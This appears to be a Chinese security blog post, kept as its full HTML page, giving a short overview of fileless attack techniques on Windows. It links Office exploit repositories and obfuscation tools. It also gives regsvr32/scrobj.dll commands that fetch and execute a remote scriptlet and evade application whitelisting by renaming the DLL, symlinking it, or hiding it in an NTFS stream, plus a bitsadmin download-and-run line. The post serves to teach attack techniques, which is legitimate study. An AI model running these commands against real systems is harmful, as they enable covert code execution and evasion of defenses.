<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Powershell,Windows,">





  <link rel="alternate" href="/atom.xml" title="scareing的学习笔记" type="application/atom+xml">






<meta name="description" content="无文件攻击方式简介  “无文件攻击”属于一种影响力非常大的安全威胁。攻击者在利用这种技术实施攻击时，不会在目标主机的磁盘上写入任何的恶意文件，因此而得名“无文件攻击”,部分无文件攻击甚至会删除自身以达到无法被捕获的目的，无文件攻击多使用 “白加黑”，“恶意文档”，“ 内存注入”，等方式绕过众多的反恶意技术的控制，包括应用白名单策略 ，使得难以防范。  0x01 恶意文档Office远程命令执行例：">
<meta name="keywords" content="Powershell,Windows">
<meta property="og:type" content="article">
<meta property="og:title" content="无文件攻击方式简介">
<meta property="og:url" content="https://github.com/scareing/scareing.github.io/2019/10/24/无文件攻击方式简介/index.html">
<meta property="og:site_name" content="scareing的学习笔记">
<meta property="og:description" content="无文件攻击方式简介  “无文件攻击”属于一种影响力非常大的安全威胁。攻击者在利用这种技术实施攻击时，不会在目标主机的磁盘上写入任何的恶意文件，因此而得名“无文件攻击”,部分无文件攻击甚至会删除自身以达到无法被捕获的目的，无文件攻击多使用 “白加黑”，“恶意文档”，“ 内存注入”，等方式绕过众多的反恶意技术的控制，包括应用白名单策略 ，使得难以防范。  0x01 恶意文档Office远程命令执行例：">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2019/10/24/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E6%96%B9%E5%BC%8F%E7%AE%80%E4%BB%8B/1.png">
<meta property="og:updated_time" content="2019-10-25T10:12:42.059Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="无文件攻击方式简介">
<meta name="twitter:description" content="无文件攻击方式简介  “无文件攻击”属于一种影响力非常大的安全威胁。攻击者在利用这种技术实施攻击时，不会在目标主机的磁盘上写入任何的恶意文件，因此而得名“无文件攻击”,部分无文件攻击甚至会删除自身以达到无法被捕获的目的，无文件攻击多使用 “白加黑”，“恶意文档”，“ 内存注入”，等方式绕过众多的反恶意技术的控制，包括应用白名单策略 ，使得难以防范。  0x01 恶意文档Office远程命令执行例：">
<meta name="twitter:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2019/10/24/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E6%96%B9%E5%BC%8F%E7%AE%80%E4%BB%8B/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://github.com/scareing/scareing.github.io/2019/10/24/无文件攻击方式简介/">





  <title>无文件攻击方式简介 | scareing的学习笔记</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">scareing的学习笔记</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">道可道，非常道, 名可名，非常名!</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://github.com/scareing/scareing.github.io/2019/10/24/无文件攻击方式简介/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="scareing">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/Bloglogo.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="scareing的学习笔记">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">无文件攻击方式简介</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-10-24T23:15:24+08:00">
                2019-10-24
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/无文件攻击/" itemprop="url" rel="index">
                    <span itemprop="name">无文件攻击</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="无文件攻击方式简介"><a href="#无文件攻击方式简介" class="headerlink" title="无文件攻击方式简介"></a>无文件攻击方式简介</h1><blockquote>
<p> “无文件攻击”属于一种影响力非常大的安全威胁。攻击者在利用这种技术实施攻击时，不会在目标主机的磁盘上写入任何的恶意文件，因此而得名“无文件攻击”,部分无文件攻击甚至会删除自身以达到无法被捕获的目的，无文件攻击多使用 “白加黑”，“恶意文档”，“ 内存注入”，等方式绕过众多的反恶意技术的控制，包括应用白名单策略 ，使得难以防范。</p>
</blockquote>
<h2 id="0x01-恶意文档"><a href="#0x01-恶意文档" class="headerlink" title="0x01 恶意文档"></a>0x01 恶意文档</h2><h3 id="Office远程命令执行"><a href="#Office远程命令执行" class="headerlink" title="Office远程命令执行"></a>Office远程命令执行</h3><h4 id="例：CVE-2017-11882"><a href="#例：CVE-2017-11882" class="headerlink" title="例：CVE-2017-11882"></a>例：CVE-2017-11882</h4><blockquote>
<p><a href="https://github.com/Ridter/CVE-2017-11882">https://github.com/Ridter/CVE-2017-11882</a></p>
</blockquote>
<h4 id="例：CVE-2018-0802"><a href="#例：CVE-2018-0802" class="headerlink" title="例：CVE-2018-0802"></a>例：CVE-2018-0802</h4><blockquote>
<p><a href="https://github.com/rxwx/CVE-2018-0802">https://github.com/rxwx/CVE-2018-0802</a> </p>
</blockquote>
<h3 id="Docx远程模板注入"><a href="#Docx远程模板注入" class="headerlink" title="Docx远程模板注入"></a>Docx远程模板注入</h3><blockquote>
<p>建立一个插入恶意宏的Docx模板,再以该恶意模板创建一个正常文档。</p>
</blockquote>
<h3 id="普通VBA-VBS宏注入"><a href="#普通VBA-VBS宏注入" class="headerlink" title="普通VBA,VBS宏注入"></a>普通VBA,VBS宏注入</h3><blockquote>
<p>直接将宏代码插入到文档。</p>
</blockquote>
<h2 id="0x02-恶意脚本"><a href="#0x02-恶意脚本" class="headerlink" title="0x02 恶意脚本"></a>0x02 恶意脚本</h2><blockquote>
<p>其实笔者还见过部分脚本，最后一句为del %0,靠删除自身来达成的无文件。所以基与此，笔者认为命令行脚本都可以在最后加上这种清除痕迹的操作。</p>
</blockquote>
<h3 id="PowerShell脚本"><a href="#PowerShell脚本" class="headerlink" title="PowerShell脚本"></a>PowerShell脚本</h3><blockquote>
<p>powershell恶意代码执行，内存注入，远程脚本注入，wmic。</p>
</blockquote>
<p>PowerShell混淆</p>
<blockquote>
<p> <a href="https://github.com/danielbohannon/Invoke-Obfuscation">https://github.com/danielbohannon/Invoke-Obfuscation</a> </p>
<p> <a href="https://github.com/trustedsec/unicorn">https://github.com/trustedsec/unicorn</a> </p>
</blockquote>
<h4 id="Bat脚本"><a href="#Bat脚本" class="headerlink" title="Bat脚本"></a>Bat脚本</h4><blockquote>
<p>白加黑，wmic</p>
</blockquote>
<h2 id="0x03-Living-off-the-Land"><a href="#0x03-Living-off-the-Land" class="headerlink" title="0x03 Living off the Land"></a>0x03 Living off the Land</h2><blockquote>
<p> 对 Microsoft Windows 众多内置工具的滥用。</p>
</blockquote>
<h5 id="bypass技巧"><a href="#bypass技巧" class="headerlink" title="bypass技巧"></a>bypass技巧</h5><ul>
<li>将利用的源文件改名。</li>
</ul>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">copy c:\windows\system32\scrobj.dll NothingToSeeHere.dll</span><br><span class="line">Regsvr32.exe /u /s /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct NothingToSeeHere.dll</span><br></pre></td></tr></table></figure>

<ul>
<li>建立指向该文件的符号链接</li>
</ul>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Mklink Dave_LovesThis.dll c:\windows\system32\scrobj.dll</span><br><span class="line">Regsvr32.exe /u /s /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Dave_LovesThis.dll</span><br></pre></td></tr></table></figure>

<ul>
<li>NTFS 数据流隐写</li>
</ul>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Type c:\windows\system32\scrobj.dll &gt; Just_A_Normal_TextFile.txt:PlacingTheDLLHere</span><br><span class="line">Regsvr32.exe /u /s /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Just_A_Normal_TextFile.txt:PlacingTheDLLHere</span><br></pre></td></tr></table></figure>

<ul>
<li>本地执行,或者下载到本地执行</li>
</ul>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Regsvr32.exe /u /s /i:c:\experiments\regsvr32\Regsvr32_calc.sct scrobj.dll</span><br><span class="line">下载执行</span><br><span class="line">bitsadmin /transfer download /download /priority normal https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct %TEMP%\test.txt &amp;&amp; regsvr32.exe /s /u /i:%TEMP%\test.txt scrobj.dll</span><br></pre></td></tr></table></figure>

<blockquote>
<p> <a href="https://github.com/LOLBAS-Project/LOLBAS">https://github.com/LOLBAS-Project/LOLBAS</a> </p>
<p> <a href="https://github.com/Micropoor/Micro8">https://github.com/Micropoor/Micro8</a> </p>
</blockquote>
<p><img src="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2019/10/24/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E6%96%B9%E5%BC%8F%E7%AE%80%E4%BB%8B/1.png" alt="avatar"></p>

      
    </div>
    
    
    
    <div>
          
            
          
    </div>

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    scareing
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://github.com/scareing/scareing.github.io/2019/10/24/无文件攻击方式简介/" title="无文件攻击方式简介">https://github.com/scareing/scareing.github.io/2019/10/24/无文件攻击方式简介/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Powershell/" rel="tag"># Powershell</a>
          
            <a href="/tags/Windows/" rel="tag"># Windows</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/10/15/Everything敏感信息泄露/" rel="next" title="Everything敏感信息泄露">
                <i class="fa fa-chevron-left"></i> Everything敏感信息泄露
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/10/28/ThinkPHP5.0RCE复现/" rel="prev" title="ThinkPHP_v5.0_rce 分析">
                ThinkPHP_v5.0_rce 分析 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/Bloglogo.jpg" alt="scareing">
            
              <p class="site-author-name" itemprop="name">scareing</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">29</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">18</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">20</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/scareing" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:scareing@qq.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#无文件攻击方式简介"><span class="nav-number">1.</span> <span class="nav-text">无文件攻击方式简介</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-恶意文档"><span class="nav-number">1.1.</span> <span class="nav-text">0x01 恶意文档</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Office远程命令执行"><span class="nav-number">1.1.1.</span> <span class="nav-text">Office远程命令执行</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#例：CVE-2017-11882"><span class="nav-number">1.1.1.1.</span> <span class="nav-text">例：CVE-2017-11882</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#例：CVE-2018-0802"><span class="nav-number">1.1.1.2.</span> <span class="nav-text">例：CVE-2018-0802</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Docx远程模板注入"><span class="nav-number">1.1.2.</span> <span class="nav-text">Docx远程模板注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#普通VBA-VBS宏注入"><span class="nav-number">1.1.3.</span> <span class="nav-text">普通VBA,VBS宏注入</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-恶意脚本"><span class="nav-number">1.2.</span> <span class="nav-text">0x02 恶意脚本</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#PowerShell脚本"><span class="nav-number">1.2.1.</span> <span class="nav-text">PowerShell脚本</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Bat脚本"><span class="nav-number">1.2.1.1.</span> <span class="nav-text">Bat脚本</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-Living-off-the-Land"><span class="nav-number">1.3.</span> <span class="nav-text">0x03 Living off the Land</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#bypass技巧"><span class="nav-number">1.3.0.0.1.</span> <span class="nav-text">bypass技巧</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">scareing</span>

  
</div>









        







        
      </div>
    </footer>

    

    

    
       <canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;"></canvas> 
       <script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
       <script type="text/javascript" src="/js/src/fireworks.js"></script>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
